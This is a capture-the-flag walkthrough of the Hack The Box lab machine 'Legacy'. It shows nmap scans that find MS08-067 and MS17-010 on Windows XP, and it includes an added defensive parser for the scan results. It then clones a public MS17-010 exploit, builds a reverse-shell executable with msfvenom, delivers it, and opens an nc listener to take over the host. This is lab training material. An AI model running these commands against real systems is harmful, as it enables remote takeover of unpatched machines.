HTB Walkthrough : Legacy


Today we’re going to solve another Windows machine called “Legacy” by ch4p. It’s available in the Hackthebox retired section for practice. Let’s get started and learn how to solve the lab.


Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • Performing an Nmap script scan
  • Exploitation
    • Setting up a virtual environment
    • Exploiting the MS17-010 vulnerability
  • Privilege Escalation
    • Administrator reverse shell using netcat

Walkthrough

IP Address : 10.129.130.212

After connecting to the Hackthebox network using their VPN connection, we can start. Without wasting too much time, let’s begin with Nmap to enumerate the running services on the target machine.

Network scanning

Using Nmap we perform the aggressive scan (-A), which does version scanning, OS detection, timing template T4 and traceroute; -Pn skips host discovery.

nmap -A 10.129.130.212 -Pn
Nmap scan report for 10.129.130.212
Host is up (0.17s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a6:d3 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-04-25T21:15:31+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

The output shows that the SMB service is running on port 445 on the target machine and that the target is a Windows XP machine. Windows XP has some very famous exploits, such as EternalBlue (MS17-010) and others. To confirm, we will run an Nmap script scan.

Enumeration

Now we know the target machine is Windows XP. To confirm whether it is affected by any famous vulnerability, an Nmap script scan is a good choice. Nmap scripts are located at /usr/share/nmap/scripts.

nmap --script smb-vuln* -p 445 10.129.130.212 -Pn

The output lists some serious vulnerabilities, including MS08-067 and MS17-010, so we are going to exploit MS17-010 without using Metasploit.

Nmap scan report for 10.129.130.212
Host is up (0.17s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
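To turn this script output into a patch-priority list (for example, in a triage script run over many hosts), here is an added parser that is not part of the original post: it extracts the state, CVE ids and risk factor of each smb-vuln-* result. The embedded sample is an abbreviated copy of the scan output above, trimmed to the lines the parser needs.

```python
import re

# Abbreviated copy of the nmap --script smb-vuln* output shown above
# (constructed for this example; reference URLs and descriptions trimmed).
SAMPLE_OUTPUT = """\
Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
"""

# A script header line: "| smb-vuln-xxx: <rest>" or "|_smb-vuln-xxx: <rest>"
SCRIPT_LINE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")

def parse_smb_vuln(output):
    """Return {script_name: {"state", "cves", "risk"}} for each smb-vuln-* script."""
    results = {}
    current = None
    for line in output.splitlines():
        m = SCRIPT_LINE.match(line)
        if m:
            name, rest = m.group(1), m.group(2).strip()
            current = results.setdefault(name, {"state": None, "cves": [], "risk": None})
            if rest == "false":            # one-line negative result
                current["state"] = "NOT VULNERABLE"
            elif rest.startswith("ERROR"):  # script failed; needs a re-run, not a verdict
                current["state"] = "ERROR"
            continue
        if current is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()   # drop the nmap tree prefix
        if body.startswith("State:"):
            current["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):
            current["cves"].extend(re.findall(r"CVE-\d{4}-\d+", body))
        elif body.startswith("Risk factor:"):
            current["risk"] = body.split(":", 1)[1].strip()
    return results

def vulnerable_findings(output):
    """Sorted names of scripts whose State is VULNERABLE, i.e. the patches to prioritise."""
    return sorted(n for n, r in parse_smb_vuln(output).items() if r["state"] == "VULNERABLE")
```

Scripts reported as ERROR are kept as a separate state so they are re-run rather than silently counted as clean.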

Exploitation

To exploit this machine we are going to use an exploit that is available on GitHub. This exploit is written in Python 2 and requires some libraries such as impacket and pycrypto. For that a virtual environment has to be set up, and the virtualenv program helps here. Once you have created the environment, you can activate it using the source shell builtin. Python 2 is used as the interpreter because in the latest Kali, Python 3 is set as the global interpreter and our exploit is in Python 2.

Why do we use a virtual environment? For that, you can check out this.

virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

Once our environment is set up successfully we can work on our exploit, which you can get from GitHub. After getting the exploit we have to check whether it can connect to our target machine and whether all the prerequisite libraries are installed properly; for that, checker.py is used.

If everything is good then we can exploit it easily .

git clone https://github.com/helviojunior/MS17-010.git
cd MS17-010
python checker.py legacy.htb

So our exploit is working fine, all the libraries are installed, and the target machine is reachable, so let’s exploit the machine and get the shell.

Here a reverse netcat shell payload is used, created with the msfvenom utility.

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f exe > shell.exe 
python send_and_execute.py legacy.htb shell.exe 445 browser

Once our payload delivery is done, we get the reverse shell using nc.

nc -lvnp 4445
type "Administrator\Desktop\root.txt"
type "john\Desktop\User.txt"

Finally we successfully exploited the machine .
